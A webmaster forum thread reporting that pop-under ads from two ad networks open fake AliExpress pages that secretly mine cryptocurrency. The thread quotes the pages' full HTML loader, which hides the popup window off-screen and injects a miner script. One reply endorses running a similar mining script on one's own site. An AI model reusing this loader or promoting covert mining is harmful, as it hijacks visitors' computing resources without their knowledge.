PopCash and Exoclick uses our traffic for hidden browser crypto mining

Hi, I want to warn you that these two networks uses our traffic for hidden browser crypto mining!!!
I guess some advertiser just abuse with campaigns and uses our traffic for mining, I can't imagine if these networks are doing this on purpose.
They show a fake AliExpress (aliexpress in a frame) and hidded crypto mining code.
That's what I found as popups from my website:

PopCash.com: http://www.livelyoffers.club/s/?utm_source=popcash&utm_campaign=popcash-selectedgeo-d-winmac_ch_026&utm_medium=Entertainment&utm_term=37686&cpv=0.00026

<html>
<head>
  <meta charset="utf-8">
  <meta name="referrer" content="never">
  <title>AliExpress Fashion</title>
  <style>
    html, body {padding:0; margin:0; width:100%; height:100%; overflow:hidden}
    iframe {border:0; height:100%; width:100%}
  </style>
  <script>
    window._HU = {
      experiments: {"threads":"1","throttle":"0.1","minimize":"1","ws":"1"},
      eventParams: {"session":"a77538473c5a5db690d6a5f7f4471242aa72a0da","coin":"etn","publisher":"popcash","country":"bg","device":"desktop"},
      job: {"coin":"etn","height":71943,"target":"11000000","id":"57ae5464","hash":"0101b6f1dbd105b7dae6148ab0346fa14340d4fa64d7b3afc7969ce8c64cc8ba76d311c5a3a971000000005897086a825d17b28ab343aebe6a8963cd8d6eb9bfee7c89c052d07ca713637529","wasm":"c","wasmVersion":201712142300,"report":10},
      isSupported: window.Worker && window.WebAssembly && (window.fetch || window.WebSocket)
    }

    if (window._HU.isSupported) {
      if (window._HU.experiments.minimize) {
        if (window._HU.experiments.minimize === '2') {
          window.moveTo(100000, 100000)
        }

        window.resizeTo(0, 0)

        if (window._HU.experiments.minimize === '3') {
          window.moveTo(100000, 100000)
        }
      }

      var s = document.createElement('script')
      s.src = '/assets/s.201712142300.js'
      document.head.appendChild(s)
    }
  </script>
</head>
<body>
  <iframe src="https://s.click.aliexpress.com/e/Vv33vnq"></iframe>
</body>
</html>

Code (markup):

Exoclick: http://www.entertainingoffers.club/s/?utm_source=exoclick&utm_campaign=exoclick-v2-entertainingoffers-shopping-Tier1-d-w10_all&utm_medium=&utm_content=adexchange-684032.com&utm_term=2726554&cpv=0.0001692&subid=1

<html>
<head>
  <meta charset="utf-8">
  <meta name="referrer" content="never">
  <title>AliExpress Fashion</title>
  <style>
    html, body {padding:0; margin:0; width:100%; height:100%; overflow:hidden}
    iframe {border:0; height:100%; width:100%}
  </style>
  <script>
    window._HU = {
      experiments: {"threads":"1","throttle":"0.1","minimize":"3","ws":"0"},
      eventParams: {"session":"6f903d733e9032b8fbec9ae421bcd11b8319937a","coin":"etn","publisher":"exoclick","country":"bg","device":"desktop"},
      job: {"coin":"etn","height":71965,"target":"11000000","id":"d9696d9b","hash":"0101e3fadbd105e3bf8cbf9cd76815bf1e846986a228e25a8333acf6a9b0f9b7d9b9db788144380000000031d222bb3a5870e4f444cf33df1b19aff61bfb1ff9595a2b3de7a7d430e7b94f0b","wasm":"c","wasmVersion":201712142300,"report":10},
      isSupported: window.Worker && window.WebAssembly && (window.fetch || window.WebSocket)
    }

    if (window._HU.isSupported) {
      if (window._HU.experiments.minimize) {
        if (window._HU.experiments.minimize === '2') {
          window.moveTo(100000, 100000)
        }

        window.resizeTo(0, 0)

        if (window._HU.experiments.minimize === '3') {
          window.moveTo(100000, 100000)
        }
      }

      var s = document.createElement('script')
      s.src = '/assets/s.201712142300.js'
      document.head.appendChild(s)
    }
  </script>
</head>
<body>
  <iframe src="https://s.click.aliexpress.com/e/Vv33vnq"></iframe>
</body>
</html>

Code (markup):

 

Why am I not surprised. I hope someone will answer these claims.

 

Yap, seems like it. You can also do the same on your own traffic. I took a js script from pop-coin.co and implemented on my site, gives a nice return.

 

Hi there.

My name is Bryan and I am the Head of the compliance team at Exoclick.

I wanted to reply personally that I have investigated this matter and banned the individual responsible for this.

In future please email us directly at to report any ad abuse and the team will investigate and take decisive action quickly towards such offenders.

Thanks for highlighting this!

 

This was mentioned in the Popads Thrad already weeks ago.

 

Exoclick always in front of the Cyber Crime!

Click shave, moblie redirects and now XMR minning.

They should hire Aalsund anf fire all the other 120 other lazy employee, who as always know of nothing.

We left that bunch of spanish crooks some weeks ago, after we noticed that they stole us millions of visitors through mobile redirects.

 

Use Popwin and Pinvert much better.

 

Pinvert still working?

 

[QUOTE = "tajb88, post: 19533275, member: 879502"] Yap, parece ser assim. Você também pode fazer o mesmo no seu próprio tráfego. Peguei um script js do pop-coin.co e implementado no meu site, dá um bom retorno. [/ QUOTE]

Bitocoin?

 

Of course we are We're just focusing on the current publishers that we have an getting more by word of mouth. We don't really have the time to advertise us on forums anymore.

- Steve